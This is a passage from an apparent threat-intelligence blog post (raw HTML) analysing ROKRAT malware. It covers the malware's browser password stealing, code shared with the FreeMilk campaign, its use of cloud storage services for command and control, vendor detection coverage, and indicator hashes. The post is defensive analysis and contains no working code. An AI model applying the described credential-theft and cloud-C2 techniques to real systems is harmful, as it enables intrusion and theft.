href=βhttps://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s1600/image14.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s640/image14.pngβ width=β390β /></a></div><br />The ROKRAT implementation is largely based on the <a href=βhttps://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentialsβ>following project</a>. This is a change of tactic for ROKRAT when compared with previous samples/versions. This time the actor is specifically targeting information which would be used for additional compromises and maybe even on potential personal accounts. The method used by the ROKRAT actors was also out of the ordinary as they embedded the whole SQLite library into their executable to allow the SQLite browsing attempts used for Firefox & Google Chrome.<br /><br />During our investigation, we discovered that the browser password stealer code is exactly the same as the code used during the <a href=βhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/β>FreeMilk</a> campaign described by Unit 42. In this article, the author already noticed C2 infrastructure overlap between FreeMilk and ROKRAT. In addition, we can add that some code overlap is present between the 2 samples:<br /><div><a href=βhttps://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s1600/image12.pngβ><img height=β408β src=βhttps://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s640/image12.pngβ width=β640β /></a></div><br />On the left, we have the ROKRAT sample and on the right the FreeMilk sample. We can notice that in addition to the code, the author copy-pasted English typos such as βIE Registeryβ.<br /><h3>Cloud Platforms Used As C&C</h3><br />Finally, this ROKRAT version uses cloud platforms in exactly the same way as our previous analysis. This time, the author did not use social network platforms, but different cloud providers:<br /><br /><ul><li><div></div><h4>pcloud</h4></li></ul><ul></ul><div><a href=βhttps://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s1600/image18.pngβ><img height=β640β src=βhttps://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s640/image18.pngβ width=β550β /></a></div><br /><br /><ul><li><h4>Box</h4></li></ul><div><a href=βhttps://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s1600/image15.pngβ><img height=β294β src=βhttps://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s640/image15.pngβ width=β640β /></a></div><div><br /></div><ul><li><h4>Dropbox</h4></li></ul><div><a href=βhttps://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s1600/image9.pngβ><img height=β458β src=βhttps://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s640/image9.pngβ width=β640β /></a></div><ul><li><h4>Yandex</h4></li></ul><div><a href=βhttps://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s1600/image16.pngβ><img height=β276β src=βhttps://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s640/image16.pngβ width=β640β /></a></div><div><br /></div><h2>Conclusion</h2><br />This campaign shows that the actor behind ROKRAT is still active. Based on the PDB, it could be the 13th version of this malware. This actor made the decision only to use legitimate cloud platforms, but changed some from the last incarnation. From an attackerβs perspective itβs an interesting choice, the flow is encrypted by default with HTTPS and the malicious flow can be difficult to find in the middle of legitimate traffic to these platforms. We can also determine that the actor likes to use code already available on the internet in various repositories we mentioned throughout this post ie; GitHub, Code Project and other public forums.<br /><br />Based on source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or working with those behind, the FreeMilk spear phishing campaign. This is further proven by the fact that ROKRAT shares code with Freenki downloader used in the FreeMilk campaign.<br /><br />Moreover, the actor is always interested by the same pattern of targets, the decoy documents refer to precise elements related to the geopolitical situation between North and South Korea. Generally, the documents reference the Ministry of Unification or the situation of North Korean citizens. They frequently contain specific references to real meetings or conferences, showing a high knowledge of current events in North and South Korea.<br /><br />Together this information helps us to understand the profile of the targeted systems and the interests of the threat actor.<br /><br /><h2>Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div><a href=βhttps://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.pngβ><img src=βhttps://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.pngβ /></a></div>Advanced Malware Protection (<a href=βhttps://www.cisco.com/c/en/us/products/security/advanced-malware-protectionβ>AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/products/security/cloud-web-security/index.htmlβ>CWS</a> or<a href=βhttps://www.cisco.com/c/en/us/products/security/web-security-appliance/index.htmlβ> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/products/security/email-security-appliance/index.htmlβ>Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href=βhttps://www.cisco.com/c/en/us/products/security/firewalls/index.htmlβ> </a><a href=βhttps://www.cisco.com/c/en/us/products/security/firewalls/index.htmlβ>NGFW</a>,<a href=βhttps://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.htmlβ> </a><a href=βhttps://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.htmlβ>NGIPS</a>, and<a href=βhttps://meraki.cisco.com/products/appliancesβ> </a><a href=βhttps://meraki.cisco.com/products/appliancesβ>Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.htmlβ>AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href=βhttps://umbrella.cisco.com/β>Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=βhttps://www.snort.org/productsβ>Snort.org</a>.<br /><br /><h2>IOCs</h2><br />Path: c:\ProgramData\HncModuleUpdate.exe<br />MalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824<br />Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037<br />Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14<br />Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f<br />ROKRAT: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e<br />Freenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5<div>
<a href=βhttp://feeds.feedburner.com/~ff/feedburner/Talos?a=fAmkhLaUPK8:-FWTXT_BreY:yIl2AUoC8zAβ><img src=βhttp://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zAβ></img></a>
</div><img src=βhttp://feeds.feedburner.com/~r/feedburner/Talos/~4/fAmkhLaUPK8β height=β1β width=β1β alt />